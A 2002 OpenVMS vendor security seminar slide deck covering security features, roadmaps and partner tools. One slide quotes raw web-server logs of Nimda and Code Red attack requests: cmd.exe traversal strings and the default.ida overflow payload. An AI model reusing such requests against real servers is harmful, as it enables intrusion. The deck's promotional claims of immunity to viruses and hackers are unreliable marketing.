Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.
-
Upload
jessie-morton -
Category
Documents
-
view
213 -
download
0
Transcript of Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.
filename\location
John Robert Wisniewski June,
2002
OpenVMS Security Seminar
filename\location
John Robert Wisniewski June,
2002
http://vmsone.com
filename\location
Security Seminars Agenda
–1 hour 15 minutes OpenVMS And IT Security Update
John Wisniewski – OpenVMS Engineering
–10 minutes Break
–1hour 15 minutes Vulnerability assessment Antonio Martin – Point Secure
–15 minutes Q&A
– Schedule Security Consulting Session For Tomorrow
filename\location
After 25 Years… Why OpenVMS…
filename\location
VMS when computer failure is not an option!
filename\location
filename\location
SECURITY HAS TO BE BUILT IN FROM THE GROUND UP
http://story.news.yahoo.com/news?tmpl=story&cid=75&ncid=738&e=8&u=/nf/20020516/tc_nf/17784
".....the Department of Defense has been running cyber security exercises against the National Security Agency, the U.S. Air Force's 92nd Information Warfare Aggressor Squadron, and the Army's Land Information Warfare Activity.
What they have learned is that the "install-and-patch" system does not work, especially against a concentrated attack. Operating systems, they have concluded, need to be designed more securely from the outset."
filename\location
From Keith Parris’s white paper on comp.os.vmsSome here have contended that because TCP/IP Services for OpenVMS is based on Tru64 Unix code, it is thus subject to the same level of risk of buffer-overflow exploits as any Unix system out there.
After a bit of investigation, I've discovered that VMS on Alpha appears to be immune to these common smash-the-stack buffer overflow attacks.
To understand why, first one must understand how common buffer-overflow attacks work. (A classic paper on such attacks is "Smashing the Stack for Fun And Profit" written by a hacker who goes by the name Aleph One. You can read it at
http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/profit.html)
So Alpha VMS is immune to common stack-smashing buffer-overflow attacks.
While any code that fails to check data lengths against buffer sizes is arguably broken, and needs to be fixed, and Compaq has been doing this to TCP/IP code as buffer-overflow bugs are identified, such bugs are much less critical on Alpha VMS compared with less-protected implementations.
SECURITY HAS TO BE BUILT IN FROM THE GROUND UP
filename\location
SECURITY HAS TO BE BUILT IN FROM THE GROUND UP
SECURITY SEARCH BY OPERATING SYSTEM NAME
http://www.cert.org/
VMS/OpenVMS -- 45 CERT Advisories in 13 years… (2 Weeks to check)
Windows 2000 -- 484 CERT Advisories in 11 Months ( 12 weeks)
Linux -- 546 CERT Advisories since 97 (14 weeks)
Solaris -- 490 CERT Advisories in 5 years (12 weeks)
AIX -- 377 CERT Advisories since 94 (9 weeks
UNIX -- 568 CERT Advisories (14 weeks)
FOR EACH CERT ADVISORY IT WOULD TAKE 1 HOUR (average) to evaluate and potentially fixed by a knowledgeable systems engineer!
filename\location
SECURITY HAS TO BE BUILT IN FROM THE GROUND UP
SECURITY SEARCH BY COMPANY
http://www.cert.org/
Oracle --206 CERT Advisories
COMPAQ --236 CERT Advisories
CISCO --361 CERT Advisories
HP --436 CERT Advisories
IBM --626 CERT Advisories
SUN --711 CERT Advisories
MicroSoft --1018 CERT Advisories
filename\location
SECURITY HAS TO BE BUILT IN FROM THE GROUND UP
BUT MICROSOFT IS IN A CLASS BY ITSELF
http://www.cert.org/Windows 2000 484
Windows XP 21
Windows NT 359
Windows 98 138
Windows 95 75
Windows Networking 401
Windows SQL 80
Windows Visual Basic 16
Windows Visual C++ 2
Windows Visual Studio 8
Windows Java 68
Windows Netscape 71
Windows LDAP 55
Windows Active Directory 31
Windows Media Player 3
Microsoft Exchange 67
Microsoft Word 30
Microsoft Excel 28
Microsoft Power Point 5
Microsoft office 221
Microsoft Internet Explorer 214
Microsoft Chat 38
Microsoft Windows 468
Back Office 257
IIS 205
This list consists of 2845 CERT Advisories regarding MicroSoft OS and Products
Which might take as much as 1.3 YEARS to evaluate.
filename\location
OpenVMSimmune to
viruses
There has never been a reported incident of OpenVMS ever being infected with a virus
filename\location
NIMDA/Code Red VMS Apache logs
Subject: access_log. from vmsone
65.193.255.237 - - [28/Sep/2001:23:40:42 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 27765.193.255.237 - - [28/Sep/2001:23:40:42 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 27565.193.255.237 - - [28/Sep/2001:23:40:43 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 28565.193.255.237 - - [28/Sep/2001:23:40:44 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 28565.193.255.237 - - [28/Sep/2001:23:40:45 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 29965.193.255.237 - - [28/Sep/2001:23:40:47 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 31665.193.255.237 - - [28/Sep/2001:23:40:49 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 31665.193.255.237 - - [28/Sep/2001:23:40:50 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 33265.193.255.237 - - [28/Sep/2001:23:40:55 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 29865.193.255.237 - - [28/Sep/2001:23:40:58 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 29865.193.255.237 - - [28/Sep/2001:23:40:58 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 29865.193.255.237 - - [28/Sep/2001:23:40:59 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 29865.193.255.237 - - [28/Sep/2001:23:40:59 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 28265.193.255.237 - - [28/Sep/2001:23:40:59 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 28265.193.255.237 - - [28/Sep/2001:23:41:00 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 29965.193.255.237 - - [28/Sep/2001:23:41:00 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 29965.64.234.177 - - [29/Sep/2001:00:22:13 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 27265.64.234.177 - - [29/Sep/2001:01:08:00 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 27265.64.234.177 - - [29/Sep/2001:01:43:20 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 27265.64.234.177 - - [29/Sep/2001:02:11:05 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 272
65.64.137.51 - - [29/Sep/2001:15:45:43 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 27765.64.137.51 - - [29/Sep/2001:15:46:36 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 27565.64.137.51 - - [29/Sep/2001:15:46:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 28565.64.234.177 - - [29/Sep/2001:15:52:35 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 272
filename\location
OpenVMSuntouched by
hackers
In congressional testimony before the Senate Governmental Affairs Committee, the world’s most notorious hacker, Kevin Mitnick, said he could not penetrate it.
Source: Governmental Affairs Committee Hearing,March 2, 2000
filename\location
In 20 years of hacking, Kevin Mitnick says he only once failed to penetrate a
computer system.
• Regarding that unsuccessful hack attempt, Mitnick, who successfully cracked computer systems belonging to Motorola , Fujitsu and Sun Microsystems, said he targeted the computer because it belonged to an "individual" who had found vulnerabilities in Digital Equipment Corp’s VMS operating system. "And my goal was obtaining information on all security vulnerabilities so I'd be effective in compromising any security system that I chose to compromise," he said.
• However, the hacker said he found his target "extremely difficult" to crack because "this person was very, very sharp" on computer security
filename\location
Security Landscape
•2002 CSI/FBI computer crime and security survey is out and available at:
http://www.gocsi.com/
– Over 500 security practitioners surveyed
– 74% cite their internet connection as the point of attack
– 82% think independent hackers and the likely sources of attack
– Website attacks (Hacktavisim and DoS)
The face of hacking is changing…
But so too are attitudes about
hackers
69% Would not consider hiring
reformed hackers as
consultants!
Would you Hire this man?
filename\location
What is DEFCON 9
•DEFCON is the 9th Convention of Hackers held once each year in Las Vegas
•http://www.defcon.org/
•4300+ hackers invaded the Hotels around the Alexis Convention Center
OpenVMS was declared Cool and Unhackable by the DEFCON Goons (judges)
filename\location
OpenVMS At DEFCON 9
filename\location
OpenVMS At DEFCON 9
OpenVMS was given “Props” from the GoonsThe DFWLUG Hacker Squad gained much gloryAnd Hackers were given a taste of a real Operating System
OpenVMS V7.2-1H1OpenVMS V7.2-1H1shippingshippingOpenVMS V7.2-1H1OpenVMS V7.2-1H1shippingshipping
OpenVMS V7.2-2OpenVMS V7.2-2shippingshippingOpenVMS V7.2-2OpenVMS V7.2-2shippingshipping
OpenVMS V7.2-6C2OpenVMS V7.2-6C2ShippingShippingOpenVMS V7.2-6C2OpenVMS V7.2-6C2ShippingShipping
OpenVMS V7.3OpenVMS V7.3shippingshippingOpenVMS V7.3OpenVMS V7.3shippingshipping
filename\location
Release Timeline
2001 H1 V7.3
2001 H2 V7.2-2
2002 H3 V7.3-1
2002 H4 Itanium™ Processor Family - First boot
2003 H2 V7.3-x
2003 H2 Itanium™ Processor Family - 1st release
2003 H3 Itanium™ Processor Family - 2nd release
2004 H1 Itanium™ Processor Family - 3rd release
2004... New OpenVMS Itanium™ Processor Family
Functional Releases
filename\location
OpenVMS Security Directions Enabling Industry Standard Security Protocols for Enabling Industry Standard Security Protocols for Authentication and Encryption in Heterogeneous Authentication and Encryption in Heterogeneous
EnvironmentsEnvironments Protecting information with cryptography
OpenSSL (open group's secure socket layer)CDSA (common data security architecture)STUNNEL (secure tunnel)SSH (secure shell) futureIPSEC (IP security) future
Enabling access through new authentication models
KerberosNTLM (NT authentication)Application access to authentication (SYS$ACM)LDAP authentication futureXML security future
• Delivering complete security services solutions
filename\location
System 1System 1
ApplicationApplicationApplicationApplication
Web serverWeb serverWeb serverWeb server
NetworkNetworkNetworkNetwork
KernelKernelKernelKernel
networknetworknetworknetwork
System 2System 2
ApplicationApplicationApplicationApplication
Web serverWeb serverWeb serverWeb server
KernelKernelKernelKernel
DBDB
NetworkNetworkNetworkNetwork
DBDB
Expanding the Model for eBiz
• Server security
• AuthenticationAuthentication
• AuthorizationAuthorization
• Access controlAccess control
• Transport security
• ConfidentialityConfidentiality
• IntegrityIntegrity
• Non-repudiationNon-repudiation
filename\location
OpenVMS Security in 7.3-1
• Kerberos
• OpenSSL (secure socket layer)
• 64-bit API calls
• Enhanced documentation
• Certificate tool
• Stunnel (secure tunnel)
• CDSA
• Enhanced documentation
• Error reporting tools
• SYS$ACM published
filename\location
System 1System 1
Network Security
NetworkNetworkNetworkNetwork
TransportTransportTransportTransport
ApplicationApplicationApplicationApplicationApplicationApplicationApplicationApplication
Web serverWeb serverWeb serverWeb server
NetworkNetworkNetworkNetwork
KernelKernelKernelKernel
PKI toolsPKI toolsPKI toolsPKI tools
SSLSSL
IPSECIPSECIPSECIPSEC
System 2System 2
ApplicationApplicationApplicationApplication
WebWeb serverserverWebWeb serverserver
NetworkNetworkNetworkNetwork
KernelKernelKernelKernel
NetworkNetworkNetworkNetwork
KerberosKerberosSSHSSHSSHSSH
= Shipping
= Planned
filename\location
Security MUP’s and Advisories
•OpenVMS DECWindows MUP (next)
•OpenVMS Alpha 7.2
•DEC-AXPVMS-VMS72_SYS-V0100--4
•DEC-AXPVMS-VMS721_SYS-V0100--4
•OpenVMS Alpha Security MUP
ALPSMUP01_070 (Versions 6.1,6.2 & 7.0)
•OpenVMS VAX Security MUP
VAXSMUP03 (All Versions prior to 6.1)
filename\location
DECwindows MUP
DECwindows motif server has a potential security vulnerability that could be exploited to allow existing users unauthorized
access to data and system resources
• This mandatory update required a reboot
• Effected systems are only those that have DECwindows server installed on them
• Supported versions impacted:
• OpenVMS alpha version 6.2 7.1-2, 7.2-1h1, 7.2-2, 7.3
• OpenVMS VAX version 6.2, 7.1, 7.2, 7.3
• SEVMS alpha version 6.2 & SEVMS VAX version 6.2
filename\location
ACMS Security Advisory
• There is a potential Security Vulnerability involving ACMS processes having more privileges enabled than the privileges specified in the authorization file.
• To protect against this potential security risk, Compaq is making available an update ECO for ACMS V4.3 customers running OpenVMS Alpha V7.2-1, V7.2-1H1, V7.2-2, and V7.3.
• For ACMS V4.4 customers a new version ACMS V4.4A. ACMS V4.4 customers should upgrade to V4.4A immediately.
filename\location
Open Source Security Notes
• Compaq’s SSRT (Software Security Response Team) is our voice to the CERT organization http://www.cert.org/
• Advisories: www.compaq.com/support
Specifically: http://ftp.support.compaq.com/patches/.new/security.shtml
• Current: (SNMP, PHP, zlib, Kerberos)
• No compromise of the OpenVMS System Security but data compromised could be possible.
filename\location
Kerberos VMS implementationKerberos in OpenVMS (V7.3-
1)
•Integration
– Based on MIT Kerberos V5 release 1.0.5
– Available on V7.2,7.3 (VAX & ALPHA) Web kit
– GSSAPI V2– GUI & DCL interface – KDC (Key Distribution
Center) & API’s (Client)– Cert fix
•Kerberized Telnet in TCP/IP services for OpenVMS Version 5.3
Kerberos Futures
•Next version (7.x)
•Port MIT Kerberos V5 release 1.2.4 to OpenVMS
– Provides “hooks” necessary for Kerberized TCP/IP utilities
– Triple-DES encryption available
•Make Kerberos API thread-safe
•Future versions
•Kerberos ACME plug-in
•Cluster-aware KDC
•Use CDSA for cryptographic functions
filename\location
OpenSSL for OpenVMS
• Port of OpenSSL 0.9.6b
• Layered Product (in V7.3-1 as LP) runs on 7.2-2
• Integration into Base O/S when OpenSSL hits 1.0
• PCSI kit containing
– 32-bit SSL & Crypt libraries– 64-bit SSL & Crypt libraries
• Features:
• 64-bit SSL and Crypto APIs (32 bit API’s as well)
• Alpha Performance
• Documentation & Examples
– New Book – Open Source Security on OpenVMS Alpha– 200 SSL APIs (60 previously undocumented)– 40 Crypt APIs (10 Previously undocumented)
• Certificate Tool
filename\location
OpenSSL limitationsOpenSSL is a set of libraries that cannot secure OpenSSL is a set of libraries that cannot secure
applications without modification to the application.applications without modification to the application.
OpenSSL alone cannot secure popular TCP/IP applications OpenSSL alone cannot secure popular TCP/IP applications such as telnet and FTP/RCPsuch as telnet and FTP/RCP
Solutions:
•SSH1 and SSH2 - secure shell
–TCP/IP services 5.3 security EAK (fall)–Process software http://www.process.com–OpenSSH
•Stunnel (www.stunnel.Org)
–SSL wrapper for TCP/IP application
filename\location
Stunnel (Secure Tunnel)Stunnel is an SSL encryption wrapper between client and a server that enables
non-SSL aware daemons to communicate with clients over a secure SSL channel.
Stunnel can be used to add SSL functionality to commonly used inetd daemons like POP-2, POP-3 and IMAP servers without any changes in the
programs' code.
•Open Source Project provided on the OpenSource Projects CD.
Limited support
Telnet & RCP works but no FTP
Threaded SMP support!
•Website: http://www.stunnel.org
filename\location
3. Application: (telnet localhost 992)
How STUNNEL works
1. SSL server:1. SSL server: (stunnel -d 992 -r localhost:23 -p stunnel.pem)(stunnel -d 992 -r localhost:23 -p stunnel.pem)2. SSL client: (stunnel -c -d 992 -r remote:992)
IP
TCP
Application
SSLserver
(Stunnel)
IP
TCP
Application
SSLclient
(Stunnel)
1
2(SSL)
3
filename\location
KerberosKerberosAPIAPI
SSL crypto librarySSL crypto library BSAFEBSAFE PKI/CertificatePKI/Certificate
OpenSSLOpenSSL
Application Security
CDSACDSA
Crypto appsCrypto apps S/MIMES/MIME PKIPKI
CryptographyCryptographyCryptographyCryptography
= Shipping
= Planned
filename\location
CDSA ArchitectureCDSA Architecture
AC Module Manager
TP Module Manager
CSP Manager
CDSA Applications
Integrity Services Security Contexts
CL Module Manager
CSSM Security API
Cryptographic Service Provider
SPI
Trust Model Library
TPI
DL Module Manager
Authorization
Computation Library
ACI
Certificate Library
CLI
Data Storage Library
DLI
filename\location
CDSA for OpenVMS
•Shipping as Part of 7.3-1
•Based on CDSA V2 release 3.11 with some 3.12 features
•Port of Tru-64 implementation with Bilateral authentication
•Prerequisite for IPSEC (will run on 7.2-2 and up)
•Contains RSA & OpenSSL as Crypto Service Providers.
•Documentation & Examples
–New Book – Open Source Security on OpenVMS Alpha Vol 1–2 example programs: DES, MDS
filename\location
SYS$ACM
• Published and supported in 7.3-1
• Reduces Authentication Calls/steps from 12 to 1!
• Example:
CSWS for OpenVMS will use this for mod_auth_openvms
• Part 1 7.3-1 SYS$ACM published!
• Part 2 7.next (VMS) Complete framework for external authentication solution (EAK)
– NDA Document “ACME Developers Guide”– New ACME Loginout & Set Password images (not
defaults)
filename\location
LDAP V3 in OpenVMS 7.3
• OpenVMS 7.3 includes an LDAP V3 API to enable access to LDAP directories anywhere in the enterprise.
• LDAP supports multi-threaded 64-bit & 32-bit applications and is COM (Common Object Model) aware.
• Certification efforts
• Microsoft’s Active Directory
• Novell’s NDS
• Compaq’s X.500 V4.0
• Kerberos V5 & Public Key Infrastructure (PKI).
filename\location
LDAP-based authentication
LDAP-basedSystem auth
LDAP: username/password + UAF mappingUAF: quota, security profile
Web auth
loginoutftptelnet }
LDAPdirectory
LDAPdirectory
CSWSCSWSloginoutloginout
$ACM$ACM auth_ldapauth_ldap mod_auth_vmsmod_auth_vms
LDAPLDAPVMSVMS
Exists
Exists
New New
Legend:
System authentication Web authentication
UAFUAF Mapping infoMapping info
UAFUAF
filename\location
LDAP – THE FUTURE DIRECTION OF OPENVMS AUTHENTICATION
Single username & password across enterprise
•LDAP directory just stores Username and Password.
•Usable by many platforms provided they agree on the same style of LDAP authentication. (Example Web page or VMS/Unix login all use same Username & password.)
•Once Authenticated the user is mapped back to a local UAF record.
•Implemented inside the ACME framework.
•Plans are in place to do this work.
filename\location
3. Token-based authentication
X509directory
X509directory
loginoutloginout
$ACM$ACM
VMSVMS “x”“x”
CDSA/EMMCDSA/EMM
Smart cardSmart card
Private keyPrivate key
Exists
Exists
New New
Legend:
filename\location
OpenVMS Security Roadmap
Alternative Authentication• BIOMETRIC support • Smartcard
ITSEC C2 Security Evaluation on V7.2-2
Version 7.x• Updated versions of:
•OpenSSL•Kerberos•CDSA
•Unix Portability features:•UID/GUID support•Case Sensitive Passwords•Minimum lifetime•CDE deadman•CDE screenlock
•ACME LOGIN Early Adopters Kit (EAK)
2002 2003 2004 2005
Version 7.3-1(Alpha only)
• CDSA (For IPSEC) • OpenSSL API Published • SYS$ACM API Published• Kerberos integration • Stunnel (Secure Tunnel)
Version 7.x(Alpha and VAX)• ACME Login base deployment
Encryption for OpenVMS V1.6
TCP/IP
Security EAK
filename\location
got secure web sites?
filename\location
a recent headlineMicrosoft released a “critical” security patch Wednesday for its Web server software, plugging 10 new holes that could allow hackers to take full control of computers running the company’s Internet Information Server (IIS) program.
Microsoft issues “critical” server fixApril 10, 2002
http://news.com.com/2100-1001-880179.html
filename\location
But wait, there’s more!
•One in Nine IIS Servers Compromised, Survey SaysNovember 5, 2001 – pcworld.com
•Security hole in SQL Server lets attackers take over
June 13, 2001 – infoworld.com
•Worm hits thousands of Solaris and IIS serversMay 11, 2001 – infoworld.com
•Microsoft gives a virus to its support customersApril 27, 2001 – infoworld.com
filename\location
Oh, by the way, hackers and viruses aren’t going away
Source: Carnegie Mellon’s Software Engineering Institute
Note that an incident may involve one site, hundreds of sites, or thousands of sites.
Incidents per year
1
10
100
1,000
10,000
100,000
1988 1993 1998 2003
filename\location
don’t treat the symptoms,
cure the disease
Instead of trying to patch your existing web servers again and again and again, start with…
• the most stable,
• the most secure,
• the most reliable server operating system:
OpenVMSStill, nothing stops it
filename\location
OpenVMSimmune to
viruses
There has never been a reported incident of OpenVMS ever being infected with a virus
filename\location
OpenVMSsecure and stable
out of the box
Security
• OpenVMS received a U.S. Trusted Computer System Evaluation Criteria (TCSEC) C2 Security Rating
• Cluster-wide, cluster aware intrusion detection
Stability
• OpenVMS doesn’t fall down
– Often put in a closet and “forgotten”
– Eighteen years without rebooting
• It’s the gold standard for high availability clustering, up to 96 nodes in a cluster
filename\location
HP Secure Web Server for OpenVMS(based on Apache)
Based on the Apache Software Foundation’s “HTTP Server” open source project known as “Apache” – http://httpd.apache.org
OpenVMS is the foundation for…
filename\location
Some Apache info… HTTP/1.1 (RFC2616) compliant web server
Runs on Windows, Linux, UNIX, OpenVMS, ...And Apache is the most popular web server on the Internet with a 63% market share
• http://www.netcraft.com/survey
Some companies drop Microsoft IISfor ApacheOctober 4, 2001
http://www.internetweek.com/newslead01/lead100401.htm
filename\location
HP Secure Web Server (SWS) for
OpenVMS
• Based on recent Apache baselevels
• Tailored for OpenVMS cluster and security architecture
• Includes SSL (certificate-based authentication and encryption services for sockets)
• VeriSign supported platform, for additional security levels
– http://www.verisign.com/support/install/
• www.openvms.compaq.com is running SWS
filename\location
SWS softwareand support
Where to get SWS software:
• http://www.openvms.compaq.com/openvms/products/ips/apache/csws.html
• e-Business CD shipped with OpenVMS software
Software cost: no cost, it’s FREE!
Support: included in standard OpenVMS license agreement at no additional cost
filename\location
for more information
SWS web site
• http://www.openvms.compaq.com/openvms/products/ips/apache/csws.html
filename\location
OpenVMS System OpenVMS System
ManagementManagement
filename\location
OpenVMSOpenVMS ToolTool PlansPlans
•Availability Manager
–V2.2 VMS 7.3-1 support (end of Summer)–V2.3 DECamds parity, no process event, write locks, low vote,
etc
•Graphical Configuration Manager V1.0 to ship with 7.3-1
•OpenVMS Web Agents V2.3 released in April
–Integrates with CIM 7, supports OVMS 7.1 - 7.3–Supports new AlphaServer environmentals for DS, ES and GS series
•ECP Data Collector & Performance Analyzer V5.4B with
VMS 7.3-1
•Increase access to metrics via system services, industry
standard SNMP MIBS & general performance data collector
filename\location
•Availability Manager
–Real time performance monitor for OpenVMS system managers–Collects system & process data and is under active
development
•ECP Data Collector & Performance Analyzer
–Historical GUI performance analyzer for OpenVMS–Maintenance releases & limited in scope
•Third Party Performance Solutions (BMC, CA, etc.)
–Enterprise level multi platform integrated solutions
Performance Solution PositioningPerformance Solution Positioning
filename\location
HP OpenView ConnectivityHP OpenView Connectivity
•CIM Enterprise solution
–Plug in for HP OpenView–Used in conjunction with OpenVMS Web agent–OVMS Web Agents to CIM Plug-in to HP OpenView
•Comtek Services (www.comtekservices.com)
–Develop OVMS SNMP Performance Agents –OpenVMS HP OpenView Network Node Manager (NNM)–300 data collection objects and 50 traps for OpenVMS–75 data objects, 30 traps & performance graphs for HP
OpenView
filename\location
POLYCENTER Evolution on OpenVMS – Single Products
POLYCENTER PerformanceAdvisor, Data Collector,Accounting Chargeback
POLYCENTER Console Manager
POLYCENTER System Watchdog
POLYCENTER Scheduler
BMC Perform & Predict for OpenVMShttp://www.bmc.com
TECSYS ConsoleWorks for OpenVMShttp://www.tdix.com
BMC Patrol for OpenVMShttp://www.bmc.com
ISE EnterpriseSchedulehttp://www.i-s-e.com
Data/Database ConversionATTUNITYhttp://www.attunity.com
ARGENT MVP Schedulerhttp://www.jams.argent-software.com
SECURITY AUDIT POINT SECURE System Detectivehttp://www.pointsecure.com
DVD/CD/CDR/WORM/OPTICALU.S. Design for OpenVMShttp://www.usdesign.com
filename\location
BMC Software AllianceBMC Software Alliance
•OpenVMS/ BMC Technology & Marketing agreement
in place for 1 Year
•Joint development effort has integrated an OpenVMS data
collector for BMC Patrol Perform & Predict
–Offering consistent reporting & analysis of Disk I/O, Process, Cluster Configuration, System Parameter & Performance Metrics–Delivers improved problem analysis & more accurate capacity
planningthan OpenVMS Monitor data–Supports enhanced workload analysis for a business-centric view of OpenVMS resource requirements
•BMC Software has made significant investment to bring OpenVMS up to parity with Unix and MS Windows product offerings
filename\location
BMC Software Cont’dBMC Software Cont’d
•OpenVMS lab testing for BMC Patrol for OpenVMS
–Gains in CPU utilization efficiencies implemented
•Improved BMC OpenVMS release schedule
–Patrol for OpenVMS V2.4 – January 2002–Patrol Perform & Predict V4.5 – April 2002–Patrol for OpenVMS V2.5 – Planned June 2002
•BMC OpenVMS functional improvements:
–Enterprise management station for all Compaq Platforms–Improved user interface for menu selection–Additional information on process resource utilization–More accurate data analysis on a native OpenVMS platform–Enhanced security for Patrol for OpenVMS (SSL, 5 security
levels, etc)
filename\location
BMC Software Cont’dBMC Software Cont’d
•BMC TDI ConsoleWorks integration for OpenVMS
–TDI ConsoleWorks now certified by BMC on the Patrol console–TDI to map console events to BMC Patrol Console Manager–TDI to become re-seller of BMC products
•Free trial down loads of the Patrol for OpenVMS solution
available on the BMC Software web site
TDC data collector down load (www.openvms.compaq.com/openvms/products/tdc/index.html)
filename\location
Computer Associates UpdateComputer Associates Update
•CA’s portfolio of products running on OpenVMS contain:
•Unicenter brand of enterprise management products
• eTrust brand of security products
• BrightStor brand of Storage products
• Advantage brand of data mgt products, including Ingres database
•CA OpenVMS solutions have gone through a re-branding
filename\location
POLYCENTER Evolution on OpenVMS – with Unicenter Branded Modular
Solutions
POLYCENTER PerformanceAdvisor, Data Collector,Accounting Chargeback
POLYCENTER Console Manager
POLYCENTER System Watchdog
POLYCENTER Scheduler
Unicenter Performance ManagementFor OpenVMS
Unicenter Console ManagementFor OpenVMS
Unicenter System WatchdogFor OpenVMS
Unicenter Job ManagementFor OpenVMS
filename\location
SecurityServices
OpenVMS Security Services
filename\location
security healthchecks with
tools from PointSecure
Security Healthcheck Service for OpenVMS (SHSO)
• A full Services-led OpenVMS security review utilizing hp services & assessment tools
• Generates a report on state of system security
• Security Self-Check for OpenVMS (SSCO)
• Customer self-check
– PointAudit– System Detective– SAT
• Implementation, training & support provides through HP Services
• Customer keeps tools
filename\location
Recent Security Automation
Large Hospital environment with 388,845 logins/month
Challenge:
•to automate to a manual security process
•tools which adhere to today’s best practice
•flexibility for assisting with HIPAA compliance
Solution: Point Audit and System Detective from PointSecure, an OpenVMS-only software partner
filename\location
enhancing securitywith SyntheSys
JabCast Secure Realtime Communications (SRC)
Secure real-time interactive text, file and document exchange across multiple operating systems.
The idSURE Card™
A biometric crypto-processing smart card integrated with a Public Key Infrastructure (PKI), digital signatures, and a Trust Center.
-available today on IP interface
-Available July on OpenVMS machine hardware interfaces
filename\location
Compaq Services
Security Service Descriptions
Security Policy development
Security Policy deployment
System Health Check
System Detective Installation
Remote Security Monitoring
Smart Card Installation/Deployment
Security Audit of Your Site
Wireless Audit of Your Site
Compaq can help with as much or as little security assistance as you need.
filename\location
If you are interested in VMS security
http://www.dfwcug.org/ Quadwords Newsletter
http://vmsone.com/ Rabid VMS stuff
http://www.cert.org/ Security advisories
